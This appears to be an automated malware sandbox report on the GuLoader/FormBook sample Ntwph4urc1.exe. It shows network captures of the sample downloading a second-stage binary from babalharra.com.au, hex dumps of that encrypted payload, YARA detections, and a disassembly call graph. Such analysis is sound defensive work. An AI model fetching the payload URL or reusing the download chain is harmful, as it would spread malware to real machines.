                                            Jan 11, 2025 04:42:16.869352102 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:16.870094061 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:16.870155096 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:17.078089952 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:17.078100920 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:17.078175068 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:17.078327894 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:17.078387976 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:17.078783989 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:17.078846931 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:17.079325914 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:17.079385996 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:17.079428911 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:17.079478979 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:17.080121994 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:17.080178976 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:17.080267906 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:17.080326080 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:17.081022024 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:17.081084013 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:17.081228971 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:17.081293106 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:17.081975937 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:17.082168102 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:17.082210064 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:17.082264900 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:17.083102942 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:17.083173990 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:17.083198071 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:17.083256960 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:17.164832115 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:17.165033102 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:17.165055037 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:17.165111065 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:17.290390015 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:17.290487051 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:17.290699005 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:17.290765047 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:17.290980101 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:17.291054010 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:17.291301966 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:17.291378021 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:17.291431904 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:17.291493893 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:17.291724920 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:17.291789055 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:17.291898012 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:17.291963100 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:17.292159081 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:17.292229891 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:17.292455912 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:17.292517900 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:17.292548895 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:17.292609930 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:17.292619944 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:17.292658091 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:17.292731047 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:17.292777061 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:17.305401087 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:17.305423975 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:17.305434942 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:17.305466890 CET49986443192.168.2.6122.201.127.17

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 11, 2025 04:42:14.883301973 CET5215753192.168.2.61.1.1.1
                                            Jan 11, 2025 04:42:14.923250914 CET53521571.1.1.1192.168.2.6

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Jan 11, 2025 04:42:14.883301973 CET192.168.2.61.1.1.10x488cStandard query (0)babalharra.com.auA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Jan 11, 2025 04:42:14.923250914 CET1.1.1.1192.168.2.60x488cNo error (0)babalharra.com.au122.201.127.17A (IP address)IN (0x0001)false

                                            HTTP Request Dependency Graph

                                            • babalharra.com.au

                                            HTTPS Proxied Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.649986122.201.127.174432224C:\Users\user\Desktop\Ntwph4urc1.exe
                                            TimestampBytes transferredDirectionData
                                            2025-01-11 03:42:15 UTC174OUTGET /yzSJO174.bin HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                            Host: babalharra.com.au
                                            Cache-Control: no-cache
                                            2025-01-11 03:42:16 UTC249INHTTP/1.1 200 OK
                                            Date: Sat, 11 Jan 2025 03:42:16 GMT
                                            Server: Apache
                                            Upgrade: h2,h2c
                                            Connection: Upgrade, close
                                            Last-Modified: Tue, 03 Dec 2024 05:37:53 GMT
                                            Accept-Ranges: bytes
                                            Content-Length: 290368
                                            Content-Type: application/octet-stream
                                            2025-01-11 03:42:16 UTC7943INData Raw: 76 6f f3 7f 72 b1 9d b1 ec 9a 0c 04 d6 03 fa 78 d3 90 7a f2 1e 3b 83 6a 04 cf ff f8 18 4e 1b 13 73 59 ad 36 8f 23 0f 5d ec a8 17 c9 c9 45 94 fd e7 db 7d b1 c4 23 99 da 9e c2 cc 3b c8 d1 15 f7 a1 2c c5 39 64 e7 bf 9b 3f a1 5f d3 ff 0c 89 b0 ce 91 c7 c5 2a 0d 99 c8 6f 8d c6 3f c6 6f e0 87 f7 57 20 0d 13 0d f2 55 26 56 35 35 cb 2a 5b 4c 14 b6 d6 ad 73 3b 37 b2 31 2e ca 23 15 64 b4 87 55 e9 d2 78 d6 68 29 24 20 84 fa 9e b5 b2 e8 99 23 8a bf 38 72 3d 0b 10 09 c7 6d f7 27 92 c2 b1 af c1 23 ce 98 60 75 09 85 a2 a8 45 cf 01 0a 2d e6 bc bd 7c b1 0f d9 e5 fc 96 e1 45 f0 64 b9 df c2 5f db 25 66 70 02 32 b5 a3 75 bb 0b 04 22 f4 b8 01 63 94 86 ad 0e 8c 17 86 e6 dc eb b7 67 05 bb 5d 83 4c 6a 74 f7 ad 7c 0c 05 ef cb 55 b4 41 39 08 3a f9 55 df 12 29 97 15 71 05 a0 df ce
                                            Data Ascii: vorxz;jNsY6#]E}#;,9d?_*o?oW U&V55*[Ls;71.#dUxh)$ #8r=m'#`uE-|Ed_%fp2u"cg]Ljt|UA9:U)q
                                            2025-01-11 03:42:16 UTC8000INData Raw: 04 fa 02 b3 1c 6f 0a 56 23 f9 8a 67 d6 9e da ca 7c 87 29 d2 d8 73 00 a4 eb 29 b5 2e cb db 41 f6 ec 48 dc 7c 6f f9 cd 3b 44 a3 fc c0 97 25 54 ba 4a 2e 3c d5 8b de 1a 35 c5 69 8b b5 bb 87 b0 d4 ec 09 94 7c 9e eb 00 cc f1 86 6a db 5c 15 a8 34 d8 f3 31 08 c9 20 be 8d ba 9d 89 e4 6c 3d 51 3d b4 6c 14 f0 98 99 ca 62 1f d4 99 fc d7 6e c1 8e 7a 5f 15 54 c3 bc cd 07 cd 10 29 61 88 ee 6d 15 b5 6e 9d 2a a1 24 00 87 0e a5 3a a5 93 ff 1b 35 9c c6 f9 88 c5 c9 f1 95 59 00 fa ec 4f a6 2d 68 6e db 9a 36 22 cd 9a 6f 76 8b 76 8f eb ee 10 b4 48 b8 25 e1 b5 8d 6c cf a9 b3 89 16 6d 6e c9 61 7e 3e 62 ce 45 7d f4 da 88 61 60 3b fd fd 61 c6 d6 35 30 a8 47 34 74 81 80 ef 13 3f f6 1d c3 25 e9 e7 e6 8a e2 c7 6d 9b 11 f4 ac e2 69 04 44 4d c3 6a aa 91 cc 4a 54 a7 2a 07 da ca c3 38 e4
                                            Data Ascii: oV#g|)s).AH|o;D%TJ.<5i|j\41 l=Q=lbnz_T)amn*$:5YO-hn6"ovvH%lmna~>bE}a`;a50G4t?%miDMjJT*8
                                            2025-01-11 03:42:16 UTC8000INData Raw: 7e c9 cb 98 b4 d9 94 ac 19 9a 0a f4 82 9d 77 1c fe 40 da 2b 61 b5 0b 5d fd 99 11 ba d1 0d 48 63 84 f0 9f b3 26 2f 42 15 ad 7f 5d 4e 94 e9 2c e3 6b 32 42 c8 1d 05 68 b3 49 1a ec 03 56 f4 19 6a a8 6e 68 6e fd 2f 08 b5 07 52 8d cb 09 36 ec 25 3e 86 18 ac ba 4f 9f 62 a4 8b 01 d0 31 66 50 a2 6e 2e 7c 71 6a 6e b7 83 6a f8 36 ee a6 79 9e 91 2a f5 9e 8e 63 82 a1 16 d8 11 05 aa 8c 6c 20 3d e1 25 76 af e7 44 ed ff 2b 75 72 4a 50 42 0d 62 ae 19 3f 20 f7 b8 2b 47 ff 67 b9 36 68 de 3b 10 27 79 34 9c af dc 85 4d 6a 77 49 1e f7 1c 66 4f b0 62 6d 0e 9e cb da 39 67 e7 7c a0 54 9e ac 72 bf 69 1a c5 ba d4 c2 75 13 34 38 9a b9 fc 1d 07 b7 d1 49 a8 bd a7 47 19 27 30 93 b8 19 3d b4 1b b7 43 98 59 29 25 60 e3 4c cb 67 a2 82 91 cd 11 38 94 8a d2 0b 84 35 c0 12 bf 21 7f 50 13 ba
                                            Data Ascii: ~w@+a]Hc&/B]N,k2BhIVjnhn/R6%>Ob1fPn.|qjnj6y*cl =%vD+urJPBb? +Gg6h;'y4MjwIfObm9g|Triu48IG'0=CY)%`Lg85!P
                                            2025-01-11 03:42:16 UTC8000INData Raw: a5 66 36 e7 5f 0c 40 a1 1c 0e 91 9a bb 49 57 39 f5 4a 98 02 26 51 03 35 ad 65 ff 71 88 b0 63 48 27 d8 1b ab ae ef 43 33 c3 67 60 d8 d4 ba fb f5 04 01 62 23 8c 90 7a ca 22 08 c8 e2 55 ee 3e f5 86 5b 3b 46 4d a5 3f 52 a9 76 a5 11 58 b9 2d 67 27 dc cc d5 43 9c d4 34 8e 4e 52 4e 00 e0 ce fd bc de 60 84 63 4c 30 00 bc 67 47 f0 58 00 18 4f a0 95 44 a9 7b ac 57 b7 ee 31 fa 83 1f 2d 16 87 34 67 6a 80 a1 5f b4 1e 9f 58 5c d2 59 5f 05 87 bd 8b cc 34 16 2d 69 d3 41 72 e1 58 b8 34 23 17 4f 0d 92 0e 57 0f 9b f5 21 26 f0 a4 14 c9 8f a0 06 09 a1 c7 2b 6a 40 74 ea bc f0 87 2c 18 87 91 ee 73 28 d0 74 49 38 cc b9 96 59 bb 90 52 93 c9 e4 16 9a 1d 76 be cf fd 3c 90 8a d6 f5 6a 18 d6 af f5 ea 27 d8 f1 ba d4 42 3f 4a d6 6c dd c5 21 fa 62 11 4a ec f9 2f 11 2f 04 33 ef 48 83 b2
                                            Data Ascii: f6_@IW9J&Q5eqcH'C3g`b#z"U>[;FM?RvX-g'C4NRN`cL0gGXOD{W1-4gj_X\Y_4-iArX4#OW!&+j@t,s(tI8YRv<j'B?Jl!bJ//3H
                                            2025-01-11 03:42:16 UTC8000INData Raw: 22 4c 8e 09 26 10 67 5b d1 a5 7d d4 c9 15 65 a4 f5 da ad 5c 1d 82 3a 5f 7a 12 e1 92 c6 75 5e 1f ca 8f c6 42 08 4f 07 19 73 1a fa dc d8 63 a8 b7 3a 02 cf f4 e7 b2 80 5a 0a 5f 78 0b 33 c6 cb fa 06 ef 35 55 4b cb 86 b5 a7 ea 54 96 51 4f ea 07 8e dd 31 5d f7 2f 50 fc f2 53 fd 91 e9 44 dc 10 1c 06 4a e4 fb d1 a8 e4 4f d4 79 ec 2f 7b 18 04 ad d8 d6 c0 5c d0 af 66 a3 f5 ac 08 a6 92 ef 0d af 75 b3 17 53 bd 89 15 07 da 6b 43 a8 05 c3 56 70 17 7c 36 c9 e9 92 90 2f 20 75 01 42 b2 bd 0e f6 ce 3f cb 20 d7 22 e7 6c b3 25 3d 26 57 ae e2 37 21 eb 8e be 69 6e 18 e9 db fc ac 1b 22 c4 25 eb ea c9 64 b0 37 13 ac 96 76 2e 90 fb 16 79 c0 6b 1e 43 1c 73 7a 98 f7 c5 96 70 01 1d ea 29 69 e0 55 51 32 f1 a7 af 92 18 9c 43 fc a9 bb 4e 39 b3 45 6f 88 40 d4 7e 2d 11 cc 1d 12 56 9a ab
                                            Data Ascii: "L&g[}e\:_zu^BOsc:Z_x35UKTQO1]/PSDJOy/{\fuSkCVp|6/ uB? "l%=&W7!in"%d7v.ykCszp)iUQ2CN9Eo@~-V
                                            2025-01-11 03:42:16 UTC8000INData Raw: 38 f0 8f cd ae 2f bd ab 42 8a 1b 73 af 35 5c 32 da 45 38 df f0 68 7a 1f 09 95 f0 10 3a c3 a7 92 7b a4 4a 11 5c 1e c3 9c 93 2b 13 b9 49 fa fd 48 25 49 d5 c0 d7 6f cf b6 87 00 a4 8c 03 25 f8 5e cd 62 6d 0d 04 95 09 67 dd 25 e2 2d 65 ef 43 e8 c3 e3 05 ab c0 91 d7 0c f9 55 fe 3c 07 ff ed ec fd 89 9a 43 21 b0 1e 40 79 80 04 fc 96 c3 76 53 99 18 ff cb 42 08 56 95 0a 5d 23 da 89 7c d8 85 ec 5e 57 04 41 a1 63 8c f6 ad 54 ba a3 98 4e ed 71 c7 19 d4 14 4a f1 4e 51 9d 80 69 1f 51 3e 92 89 c4 e2 55 7e e9 68 3c 38 cc e6 a1 e5 c9 e6 20 59 9c f6 2c 71 2c 45 c9 0c 11 dd fc fb 36 61 9a c1 aa c7 59 c4 d3 b8 11 01 14 1e 21 93 6b 59 f5 ca 0c d2 71 8c bb 86 9b b8 92 8e 7b 8c 46 31 c3 1b dc ed c2 a3 77 10 b3 6d b8 c5 e8 7b 1a 03 d3 ba a2 41 29 31 57 73 78 8d e0 e6 2e be 9f 2e
                                            Data Ascii: 8/Bs5\2E8hz:{J\+IH%Io%^bmg%-eCU<C!@yvSBV]#|^WAcTNqJNQiQ>U~h<8 Y,q,E6aY!kYq{F1wm{A)1Wsx..
                                            2025-01-11 03:42:16 UTC8000INData Raw: 2d db a1 cf e8 27 52 a8 9e c2 bf d4 0d 72 35 f9 3f 3f 9d b0 a2 06 dd 48 8e df 4a 36 ba 75 bb 68 7a ac 05 9e 74 7b b1 66 73 77 fd 59 fc a7 41 58 b5 80 06 8f 68 ee ef 7d 8b 9f 12 95 6c ef 13 6e 06 2c 99 e7 8f 31 d8 50 55 ad 21 b6 e6 42 44 67 92 bd a7 bd c7 b5 b4 ce 52 c1 e4 87 4a 25 63 dd 77 4c 35 57 7d fe f8 b1 d8 c4 ff e6 cf 27 e9 d9 6e 97 cd 40 b4 4d 5d 20 27 38 c7 1c 39 9c 1f 8a f1 31 c2 4c 33 ed 34 75 de c3 69 6c 4a 2d 92 c6 55 ad 82 28 f8 d5 8e a3 00 1f 05 a8 c2 b1 2d 3c 07 b3 9d 66 6d 46 e8 56 96 26 3c f9 08 68 00 1a df e6 85 33 bf a1 c0 ed 05 f5 1e 8b c8 a6 0d cf 74 49 3d 23 1b 0b b6 f5 63 8b 46 42 97 19 d1 90 6f 45 79 c3 d2 f3 a8 1b 9d 16 e3 2b ad 52 54 b0 63 2a 68 ea f6 42 9a 24 42 18 29 5c 13 48 3c 82 b3 2a ac b9 a8 cb 53 66 bc f2 4b 56 f2 04 8f
                                            Data Ascii: -'Rr5??HJ6uhzt{fswYAXh}ln,1PU!BDgRJ%cwL5W}'n@M] '891L34uilJ-U(-<fmFV&<h3tI=#cFBoEy+RTc*hB$B)\H<*SfKV
                                            2025-01-11 03:42:16 UTC8000INData Raw: 5f b1 cb e4 e4 ec 1f d4 f2 14 fc 03 72 33 23 6d c7 1d 1f 8d 43 3e 6b 75 b7 70 18 26 dd 74 f9 06 fa 42 df 81 7f bf 2a 7b 7e d7 08 a9 05 8d 85 b0 c2 ce 33 57 aa ae a5 e1 a6 30 92 03 90 68 f3 6c 83 4c 9b 07 ea b9 68 72 09 cf d1 ff 1b ac 87 8c 01 c5 97 53 a1 dc 78 63 9d 03 e9 31 e1 60 18 d2 20 fd 21 db 9f 39 83 8f 7a a0 3a 4b fe 9e 3f 16 de 9f 39 c2 48 3c e5 92 be 1e 98 6d 64 a0 23 7a b5 14 13 f3 d6 b8 f9 5c e7 b6 d7 b3 99 1b 65 ac 93 d9 6e f6 04 d6 42 a4 1e 9e 35 a9 8d 6d 31 94 fa 41 f7 ea a0 12 3b 29 0e 1b 6e ea 11 2f f3 18 bc 19 91 2b 8d 4a e7 6f 09 1b 50 37 65 75 f1 4c 0d ef af 56 6c 0e c5 db 6c e8 2c 02 be 09 a6 78 0e eb c4 e3 54 0a f6 ce 66 8f 96 93 b7 f8 19 cf 2c 67 2a 80 a4 e2 f5 27 4e 1e 68 ab a6 e5 8e f3 17 0b 16 83 24 63 60 af 12 67 fc 06 c1 48 ca
                                            Data Ascii: _r3#mC>kup&tB*{~3W0hlLhrSxc1` !9z:K?9H<md#z\enB5m1A;)n/+JoP7euLVll,xTf,g*'Nh$c`gH
                                            2025-01-11 03:42:16 UTC8000INData Raw: 87 db ca 1b 32 e7 a3 83 93 8f 81 1b 34 80 61 f8 68 ec be 56 3c e8 ec 78 97 05 20 82 2d 33 bb be ba e7 24 e2 af c2 7e ba 92 a2 b7 8c 49 b7 80 19 f8 82 fe 36 60 a3 b8 7c 87 96 d4 5c 2a 36 2d cf 30 b2 78 d6 04 08 f1 88 26 bb 4b e3 45 9b f9 b6 c5 7a ca df e7 d3 1b 92 65 c2 2a 98 55 b6 7d ba b9 56 43 d9 fb 3e f9 a8 df c9 08 1c 40 08 15 76 ce ea 50 fc 46 db 07 94 f9 dd d8 bf 81 32 74 49 c0 c6 83 10 cc b7 12 af 36 dd 0d 50 41 98 84 b2 ec b1 f5 8a 73 e1 8b ee 82 a5 74 ca e0 c1 79 1b 59 02 73 49 64 d7 2e 2e a2 da e6 a9 a3 80 8f 71 c7 32 07 a4 c7 42 3d 39 f5 fe 64 6b 8f eb 30 f3 e6 9f 05 4d 40 14 58 9e a3 ec bf 09 b5 3d 72 39 c1 8c 5e 56 0f 17 11 dc 45 1d a3 93 7c 54 8d a7 6e 9b 4f f6 b9 78 ac d7 ae d4 d8 f8 8b 3d ce f9 14 54 9a ab 6a c9 8b d6 40 99 de 30 24 b9 9c
                                            Data Ascii: 24ahV<x -3$~I6`|\*6-0x&KEze*U}VC>@vPF2tI6PAstyYsId..q2B=9dk0M@X=r9^VE|TnOx=Tj@0$
                                            2025-01-11 03:42:16 UTC8000INData Raw: 74 d0 2c 83 02 12 a0 ba 49 fb f3 cb 17 c2 34 e8 79 77 71 3a 3e 8c 73 3c 7f d3 8a 8a 76 16 4c f4 47 5e 41 51 36 fe 1f 4b be 71 ad 64 26 77 30 1d 75 a9 b6 04 c9 11 19 ac ca c8 69 08 8f 65 36 20 01 62 a1 fd 1f 57 0a ef 4c d6 c3 4a 52 bb d0 6a 15 56 4d 9a 73 c6 aa f9 d0 fd 96 b7 63 e7 e6 fd 0d 8f 8e 9d 0a 96 5f 7e e7 d6 d1 05 b3 bb cb ca 4f bd 19 61 6b ab bf a4 f0 e9 17 35 3f 0b ff 64 77 fe dd af 6b ca 06 ca 2b 60 fc df 36 c6 a9 db d8 b2 b2 d4 3a cf bc 5a 85 af 46 d3 01 a8 98 d1 54 43 bc fe 3b d5 36 e3 2f 64 c0 e6 67 cf e9 bd 18 5b 7c 28 7b ed 88 66 8f 11 a8 d4 06 16 50 9d c5 cd 79 9a 12 03 76 70 ba d8 d1 e8 81 de 25 84 46 1b 00 70 39 bb 40 e6 82 9c 1e b7 e8 b5 0f f4 5e 68 cf af cc db f1 4e 7e ab 56 34 f0 e7 00 8d d8 15 a3 0e 40 5e ef 1b 33 7e 8c 67 bb 0a 49
                                            Data Ascii: t,I4ywq:>s<vLG^AQ6Kqd&w0uie6 bWLJRjVMsc_~Oak5?dwk+`6:ZFTC;6/dg[|({fPyvp%Fp9@^hN~V4@^3~gI


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:22:41:05
                                            Start date:10/01/2025
                                            Path:C:\Users\user\Desktop\Ntwph4urc1.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Ntwph4urc1.exe"
                                            Imagebase:0x400000
                                            File size:437'610 bytes
                                            MD5 hash:C57DA1BB37A79E6F05722518DBADB3CE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2691971369.000000000507C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:6
                                            Start time:22:41:57
                                            Start date:10/01/2025
                                            Path:C:\Users\user\Desktop\Ntwph4urc1.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Ntwph4urc1.exe"
                                            Imagebase:0x400000
                                            File size:437'610 bytes
                                            MD5 hash:C57DA1BB37A79E6F05722518DBADB3CE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3114905568.00000000365B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:18.7%
                                              Dynamic/Decrypted Code Coverage:13.6%
                                              Signature Coverage:15.9%
                                              Total number of Nodes:1580
                                              Total number of Limit Nodes:32
                                              execution_graph 4024 401941 4025 401943 4024->4025 4030 402d3e 4025->4030 4031 402d4a 4030->4031 4075 40642b 4031->4075 4034 401948 4036 405b00 4034->4036 4117 405dcb 4036->4117 4039 405b28 DeleteFileW 4041 401951 4039->4041 4040 405b3f 4046 405c6a 4040->4046 4131 4063ee lstrcpynW 4040->4131 4043 405b65 4044 405b78 4043->4044 4045 405b6b lstrcatW 4043->4045 4132 405d0f lstrlenW 4044->4132 4047 405b7e 4045->4047 4046->4041 4160 40674c FindFirstFileW 4046->4160 4050 405b8e lstrcatW 4047->4050 4052 405b99 lstrlenW FindFirstFileW 4047->4052 4050->4052 4055 405c5f 4052->4055 4073 405bbb 4052->4073 4053 405c88 4163 405cc3 lstrlenW CharPrevW 4053->4163 4055->4046 4057 405c42 FindNextFileW 4061 405c58 FindClose 4057->4061 4057->4073 4058 405ab8 5 API calls 4060 405c9a 4058->4060 4062 405cb4 4060->4062 4063 405c9e 4060->4063 4061->4055 4065 405456 24 API calls 4062->4065 4063->4041 4066 405456 24 API calls 4063->4066 4065->4041 4068 405cab 4066->4068 4067 405b00 60 API calls 4067->4073 4070 4061b4 36 API calls 4068->4070 4069 405456 24 API calls 4069->4057 4071 405cb2 4070->4071 4071->4041 4073->4057 4073->4067 4073->4069 4136 4063ee lstrcpynW 4073->4136 4137 405ab8 4073->4137 4145 405456 4073->4145 4156 4061b4 MoveFileExW 4073->4156 4089 406438 4075->4089 4076 406683 4077 402d6b 4076->4077 4108 4063ee lstrcpynW 4076->4108 4077->4034 4092 40669d 4077->4092 4079 406651 lstrlenW 4079->4089 4080 40642b 10 API calls 4080->4079 4083 406566 GetSystemDirectoryW 4083->4089 4085 406579 GetWindowsDirectoryW 4085->4089 4086 40669d 5 API calls 4086->4089 4087 40642b 10 API calls 4087->4089 4088 4065f4 lstrcatW 4088->4089 4089->4076 4089->4079 4089->4080 4089->4083 4089->4085 4089->4086 4089->4087 4089->4088 4090 4065ad SHGetSpecialFolderLocation 4089->4090 4101 4062bc 4089->4101 4106 406335 wsprintfW 4089->4106 4107 4063ee lstrcpynW 4089->4107 4090->4089 4091 4065c5 SHGetPathFromIDListW CoTaskMemFree 4090->4091 4091->4089 4099 4066aa 4092->4099 4093 406720 4094 406725 CharPrevW 4093->4094 4097 406746 4093->4097 4094->4093 4095 406713 CharNextW 4095->4093 4095->4099 4097->4034 4098 4066ff CharNextW 4098->4099 4099->4093 4099->4095 4099->4098 4100 40670e CharNextW 4099->4100 4113 405cf0 4099->4113 4100->4095 4109 40625b 4101->4109 4104 4062f0 RegQueryValueExW RegCloseKey 4105 406320 4104->4105 4105->4089 4106->4089 4107->4089 4108->4077 4110 40626a 4109->4110 4111 406273 RegOpenKeyExW 4110->4111 4112 40626e 4110->4112 4111->4112 4112->4104 4112->4105 4114 405cf6 4113->4114 4115 405d0c 4114->4115 4116 405cfd CharNextW 4114->4116 4115->4099 4116->4114 4166 4063ee lstrcpynW 4117->4166 4119 405ddc 4167 405d6e CharNextW CharNextW 4119->4167 4122 405b20 4122->4039 4122->4040 4123 40669d 5 API calls 4126 405df2 4123->4126 4124 405e23 lstrlenW 4125 405e2e 4124->4125 4124->4126 4128 405cc3 3 API calls 4125->4128 4126->4122 4126->4124 4127 40674c 2 API calls 4126->4127 4130 405d0f 2 API calls 4126->4130 4127->4126 4129 405e33 GetFileAttributesW 4128->4129 4129->4122 4130->4124 4131->4043 4133 405d1d 4132->4133 4134 405d23 CharPrevW 4133->4134 4135 405d2f 4133->4135 4134->4133 4134->4135 4135->4047 4136->4073 4173 405ebf GetFileAttributesW 4137->4173 4140 405ae5 4140->4073 4141 405ad3 RemoveDirectoryW 4143 405ae1 4141->4143 4142 405adb DeleteFileW 4142->4143 4143->4140 4144 405af1 SetFileAttributesW 4143->4144 4144->4140 4146 405471 4145->4146 4154 405513 4145->4154 4147 40548d lstrlenW 4146->4147 4148 40642b 17 API calls 4146->4148 4149 4054b6 4147->4149 4150 40549b lstrlenW 4147->4150 4148->4147 4152 4054c9 4149->4152 4153 4054bc SetWindowTextW 4149->4153 4151 4054ad lstrcatW 4150->4151 4150->4154 4151->4149 4152->4154 4155 4054cf SendMessageW SendMessageW SendMessageW 4152->4155 4153->4152 4154->4073 4155->4154 4157 4061d5 4156->4157 4158 4061c8 4156->4158 4157->4073 4176 40603a 4158->4176 4161 406762 FindClose 4160->4161 4162 405c84 4160->4162 4161->4162 4162->4041 4162->4053 4164 405c8e 4163->4164 4165 405cdf lstrcatW 4163->4165 4164->4058 4165->4164 4166->4119 4168 405d8b 4167->4168 4171 405d9d 4167->4171 4170 405d98 CharNextW 4168->4170 4168->4171 4169 405dc1 4169->4122 4169->4123 4170->4169 4171->4169 4172 405cf0 CharNextW 4171->4172 4172->4171 4174 405ed1 SetFileAttributesW 4173->4174 4175 405ac4 4173->4175 4174->4175 4175->4140 4175->4141 4175->4142 4177 406090 GetShortPathNameW 4176->4177 4178 40606a 4176->4178 4180 4060a5 4177->4180 4181 4061af 4177->4181 4203 405ee4 GetFileAttributesW CreateFileW 4178->4203 4180->4181 4183 4060ad wsprintfA 4180->4183 4181->4157 4182 406074 CloseHandle GetShortPathNameW 4182->4181 4184 406088 4182->4184 4185 40642b 17 API calls 4183->4185 4184->4177 4184->4181 4186 4060d5 4185->4186 4204 405ee4 GetFileAttributesW CreateFileW 4186->4204 4188 4060e2 4188->4181 4189 4060f1 GetFileSize GlobalAlloc 4188->4189 4190 406113 4189->4190 4191 4061a8 CloseHandle 4189->4191 4205 405f67 ReadFile 4190->4205 4191->4181 4196 406132 lstrcpyA 4198 406154 4196->4198 4197 406146 4199 405e49 4 API calls 4197->4199 4200 40618b SetFilePointer 4198->4200 4199->4198 4212 405f96 WriteFile 4200->4212 4203->4182 4204->4188 4206 405f85 4205->4206 4206->4191 4207 405e49 lstrlenA 4206->4207 4208 405e8a lstrlenA 4207->4208 4209 405e92 4208->4209 4210 405e63 lstrcmpiA 4208->4210 4209->4196 4209->4197 4210->4209 4211 405e81 CharNextA 4210->4211 4211->4208 4213 